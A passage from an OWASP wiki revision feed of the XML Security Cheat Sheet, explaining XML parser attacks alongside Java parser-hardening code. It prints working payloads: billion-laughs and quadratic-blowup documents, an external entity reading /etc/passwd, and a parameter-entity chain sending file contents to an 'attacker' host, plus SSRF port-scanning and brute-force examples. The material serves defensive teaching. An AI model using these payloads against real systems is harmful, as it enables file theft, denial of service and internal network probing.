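    factory.newSAXParser().parse(xml, new DefaultHandler() {
      @Override
      public void characters(char[] ch, int start, int length) {
        text.append(ch, start, length);
      }
    });
    return text.toString();
  }
}
```

With these settings, a reference to an external entity should be skipped rather than replaced with the contents of the referenced file.&lt;br /&gt;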
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   // No hardening properties are set on the factory&lt;br /&gt;
   XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
   // try-with-resources closes the input stream when parsing ends&lt;br /&gt;
   try (FileInputStream in = new FileInputStream(&amp;quot;contacts.xml&amp;quot;)) {&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, in);&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     xmlfer.next();&lt;br /&gt;
     // Print every event that carries text, such as the DTD and character data&lt;br /&gt;
     if (xmlfer.hasText()) {&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
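&lt;br /&gt;
The StAX API exposes standard properties to turn off DTD support and external entities. The following is a minimal sketch; &amp;lt;tt&amp;gt;HardenedStaxParser&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;extractText&amp;lt;/tt&amp;gt; are hypothetical names. Depending on the StAX implementation, a document that still references an entity may be rejected with an &amp;lt;tt&amp;gt;XMLStreamException&amp;lt;/tt&amp;gt; or read with the reference left unexpanded.&lt;br /&gt;

```java
import java.io.InputStream;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Hypothetical helper: reads character data with DTDs and external entities disabled.
class HardenedStaxParser {
  static String extractText(InputStream xml) throws XMLStreamException {
    XMLInputFactory factory = XMLInputFactory.newInstance();
    factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
    factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
    XMLStreamReader reader = factory.createXMLStreamReader(xml);
    StringBuilder text = new StringBuilder();
    try {
      while (reader.hasNext()) {
        // Only character data is collected; the DOCTYPE event is ignored.
        if (reader.next() == XMLStreamConstants.CHARACTERS) {
          text.append(reader.getText());
        }
      }
    } finally {
      reader.close();
    }
    return text.toString();
  }
}
```

Unlike the vulnerable sample, this version collects only &amp;lt;tt&amp;gt;CHARACTERS&amp;lt;/tt&amp;gt; events, so the document type declaration is never echoed back.&lt;br /&gt;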
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
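When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the DTD describes a circular reference between entities. The XML specification does not allow an entity to reference itself directly or indirectly, so a conforming parser should report an error instead of expanding it:&lt;br /&gt;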
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The following attack expands to 100,000 * 100,000 (10&amp;lt;sup&amp;gt;10&amp;lt;/sup&amp;gt;) characters in memory:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
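&lt;br /&gt;
The arithmetic behind this attack can be worked out directly. The following sketch compares the characters the attacker sends with the characters the parser has to hold; &amp;lt;tt&amp;gt;QuadraticBlowupMath&amp;lt;/tt&amp;gt; and its methods are hypothetical names, and the few characters of the surrounding &amp;lt;tt&amp;gt;DOCTYPE&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; markup are ignored.&lt;br /&gt;

```java
// Hypothetical helper: estimates the amplification of a quadratic blowup payload.
class QuadraticBlowupMath {
  // Characters the parser must hold after expanding every reference.
  static long expandedChars(long entityLength, long references) {
    return entityLength * references;
  }

  // Characters actually sent: one entity value plus the references to it.
  // Each reference costs the entity name plus two delimiters (ampersand and semicolon).
  static long payloadChars(long entityLength, long references, String entityName) {
    return entityLength + references * (entityName.length() + 2L);
  }

  public static void main(String[] args) {
    long sent = payloadChars(100_000L, 100_000L, "A");
    long expanded = expandedChars(100_000L, 100_000L);
    System.out.println("sent=" + sent + " expanded=" + expanded + " ratio=" + (expanded / sent));
  }
}
```

For the example above, about 400,000 characters on the wire expand to 10,000,000,000 characters, an amplification of roughly 25,000 times.&lt;br /&gt;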
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities defined in the following document, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD that includes the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; is resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; references in its definition; each of those is resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; references, and so on. In the end, the parser has to produce 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is, 3*10^9 (3,000,000,000) characters, and the CPU and/or memory consumed could make the parser crash.&lt;br /&gt;
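&lt;br /&gt;
A quick way to check whether a Java parser configuration withstands this document is to parse it with secure processing enabled and see whether it is refused. The following is a minimal sketch that assumes the JDK's built-in parser, which should stop once its entity expansion limit is exceeded (the exact limit depends on the JDK version and configuration); &amp;lt;tt&amp;gt;EntityExpansionProbe&amp;lt;/tt&amp;gt; is a hypothetical name.&lt;br /&gt;

```java
import java.io.InputStream;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

// Hypothetical helper: reports whether the parser refuses a document.
class EntityExpansionProbe {
  // Returns true when parsing fails, for example because an expansion limit was hit.
  static boolean isRejected(InputStream xml) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    // Secure processing asks the implementation to apply its resource limits.
    factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    try {
      factory.newDocumentBuilder().parse(xml);
      return false;
    } catch (SAXException e) {
      return true;
    }
  }
}
```

This probe should only be run against a parser in a test environment, since an unprotected parser may exhaust memory while expanding the entities.&lt;br /&gt;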
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this, certain SOAP implementations have parsed DTD schemas within SOAP messages. The following example illustrates a case where the parser does not follow the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE soap:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;soap:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:soap=&amp;quot;&amp;lt;nowiki&amp;gt;http://schemas.xmlsoap.org/soap/envelope/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;&amp;lt;nowiki&amp;gt;urn:parasoft:ws:store&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove the existence of an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External DNS Resolution ====&lt;br /&gt;
&lt;br /&gt;
Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but it requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''% xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM &amp;lt;nowiki&amp;gt;'&amp;lt;/nowiki&amp;gt;'''&amp;lt;nowiki&amp;gt;http://example.com/?%file;&amp;lt;/nowiki&amp;gt;'''&amp;lt;nowiki&amp;gt;'&amp;lt;/nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried, so you have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If a timeout occurs when trying to connect to a closed port (which may take one minute), while the response from an open port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish in higher-latency networks.&lt;br /&gt;
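&lt;br /&gt;
The averaging step can be sketched as follows. This is an illustration only: &amp;lt;tt&amp;gt;PortTimingAnalysis&amp;lt;/tt&amp;gt;, its method names, and the tolerance value are hypothetical, and collecting the measurements is left to the tester.&lt;br /&gt;

```java
// Hypothetical helper: compares averaged response times measured for two ports.
class PortTimingAnalysis {
  // Mean of the measured response times, in milliseconds.
  static double averageMillis(long[] samples) {
    if (samples.length == 0) {
      throw new IllegalArgumentException("at least one sample is required");
    }
    long total = 0;
    for (long sample : samples) {
      total += sample;
    }
    return (double) total / samples.length;
  }

  // True when the two averages differ by more than the given tolerance.
  static boolean differs(long[] first, long[] second, double toleranceMillis) {
    return Math.abs(averageMillis(first) - averageMillis(second)) > toleranceMillis;
  }
}
```

Taking more samples per port reduces the effect of network jitter, which is why this technique becomes unreliable when latency varies more than the difference being measured.&lt;br /&gt;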
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229414</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229414"/>
				<updated>2017-05-04T16:41:26Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Server Side Request Forgery */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
